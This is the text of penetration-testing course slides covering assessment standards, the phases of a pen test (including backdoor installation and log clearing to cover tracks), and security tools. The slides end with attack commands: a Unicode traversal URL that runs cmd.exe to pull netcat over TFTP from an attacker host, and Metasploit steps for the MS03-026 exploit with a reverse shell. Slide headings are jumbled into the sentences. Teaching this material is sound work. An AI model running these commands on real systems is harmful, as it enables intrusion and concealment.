Program:Certified Computer Security Analyst (CCSA) LSP Telematika Created By Semi Yulianto Shared By Linuxer@kaskus.co.id
Semi YuliantoMCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA,CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc Independent Trainer and Consultant EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)Current Roles: ITS2 (Riyadh, Saudi Arabia) Senior Technical Trainer/Security Consultant IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia) Security Consultant (Web Application Pen-Tester) Security Consultant (ESET Anti-Virus & Smart Security)email@example.com and firstname.lastname@example.orgContacts:+62 852 1325 6600 and +60 14 9377 462
1. Vulnerabilities by Management Categories2. Assessment Standards3. Assessment Service Definition4. Network Assessment Methodology5. Pen-Test Methodology6. Security Tools7. Investigating Vulnerabilities
OS configuration - Vulnerabilities due to improperly configured operating system software. Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities. Password/access control - Failure to comply with password policy and improper access control settings. Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use. Dangerous services - Existence of vulnerable or easily exploited services or processes. Application configuration - Vulnerabilities due to improperly configured applications.
The United States National Security Agency (NSA) has provided an NSA (US) INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com The Government Communications Headquarters (GCHQ) in the United CESG CHECK (UK) Kingdom has an information assurance arm known as the Communications and Electronics security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security Security Group (CESG). In the same way that the NSA IAM framework allows testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
Assessment - Level 1 involves discovering a cooperative high-The IAM framework defines three levels of assessment: level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands- on network or system testing is undertaken at this level. Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise. Red Team - Level 3 is non cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is on intrusive, so within this framework, a Level 3 assessment involves full qualification of vulnerabilities.
1. Use of DNS information retrieval tools for both single andThe CESG CHECK network security assessment as: multiple records, including an understanding of DNS record structure relating to target hosts.2. Use of ICMP, TCP, and UDP network mapping and probing tools3. Demonstration of TCP service banner grabbing.4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes.5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
1. User enumeration via finger, rusers, rwho, and SMTPCESG CHECK Unix-specific competencies: techniques2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services.3. Demonstration of testing for Network File System (NFS) weaknesses.4. Testing for weaknesses within r-services (rsh, rexec, and rlogin).5. Detection of insecure X Windows servers.6. Testing for weaknesses within web, FTP, and Samba services.
1. Assessment of NetBIOS and CIFS services to enumerateCESG CHECK Windows NT-specific competencies: users, groups, shares, domains, domain controllers, password policies, and associated weaknesses.2. Username and password grinding via NetBIOS and CIFS services.3. Detecting and demonstrating presence of known security weaknesses within.4. Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
ISECOM’s Open Source Security Testing MethodologyOther Assessment Standards & Associations: Manual (OSSTMM) http://www.osstmm.org Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com TIGER Scheme http://www.tigerscheme.org EC-Council’s Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm Open Source Web Application Security Project (OWASP) http://www.owasp.org
Uses automated systems (such as Nessus, ISS Internet Vulnerability Scanning Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security. An effective blend of automated and hands-on manual Network Security Assessment vulnerability testing and qualification. The report is usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.
Involves post-authentication assessment of web application Web Application Testing components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated. Involves multiple attack vectors (e.g., telephone war dialing, Penetration Testing social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
Provides the clearest picture of network security. Onsite Audition Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
1. Network reconnaissance to identify IP networksHigh-level components of Network Assessment: and hosts of interest.2. Bulk network scanning and probing to identify potentially vulnerable hosts.3. Investigation of vulnerabilities and further network probing by hand.4. Exploitation of vulnerabilities and circumvention of security mechanisms.
1. Information Gathering2. Service Enumeration3. Vulnerability Identification4. Penetration5. Maintaining Access6. Housekeeping
The objective of information gathering is to find as Information Gathering many information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering. Involves launching network and port scanning to Service Enumeration find open, filtered ports and services running on a specific port.
Involves finding new and currently available Vulnerability Identification vulnerability on the operating systems, applications and/or services (manual or automated). Involves active penetration on a specific target of Penetration evaluation by exploiting any new or known vulnerability.
Involves uploading trojan or backdoor with the Maintaining Access objective to make it easier to go in and out from a target of evaluation without having to do the exploitation and ensure that the activities are not being noticed. Clearning up to cover tracks. Involves disabling Housekeeping audit settings and clearing or altering log files (system, security and application).
1. Nmap (http://www.insecure.org)Scanning Tools:2. Nessus (http://www.nessus.org)3. ISS Internet Scanner (http://www.iss.net)4. eEye Retina (http://www.eeye.com)5. QualysGuard (http://www.qualys.com)6. Matta Colossus (http://www.trustmatta.com)
TFTP (Trivial File Transfer Protocol)Upload and Download Syntax: tftp –i <localhost_ip> GET <file> tftp –i <localhost_ip> PUT <file> Example: tftp –i 220.127.116.11 GET nc.exe tftp –i 18.104.22.168 PUT nc.exe Unicode Examples: GET http://22.214.171.124/scripts/..%255c../winnt/syste m32/cmd.exe?/c+tftp+-i+126.96.36.199+GET+nc.exe
Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole Syntax: msf > help msf > show exploits msf > use <exploit_module> msf > show payloads msf > set PAYLOAD <payload_type> msf > show options msf > set RHOST <target_ip> msf > set LHOST <localhost_ip> msf > set LPORT <local_port> msf > set RPORT <remote_port> msf > show targets msf > set TARGET <target_id> msf > exploit
Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole Example: msf > help msf > show exploits msf > use windows/dcerpc/ms03_026_dcom msf > show payloads msf > set PAYLOAD windows/shell/reverse_tcp msf > show options msf > set RHOST 188.8.131.52 msf > set LHOST 184.108.40.206 msf > set LPORT 5555 msf > set RPORT 1234 msf > show targets msf > set TARGET 0 msf > exploit
Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole Syntax: msf > help msf > show auxiliary msf > use <auxiliary_module> msf > set RHOSTS <target_ip_or_network_id> msf > run
Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole Example 1: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 220.127.116.11 msf > run Example 2: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 18.104.22.168/24 msf > run
Metasploit Framework Exploit Module (MSFCLI) cd /pentest/exploits/msf3 Syntax: ./msfcli <exploit_module> <payload_type> <options> E Example: ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=22.214.171.124 E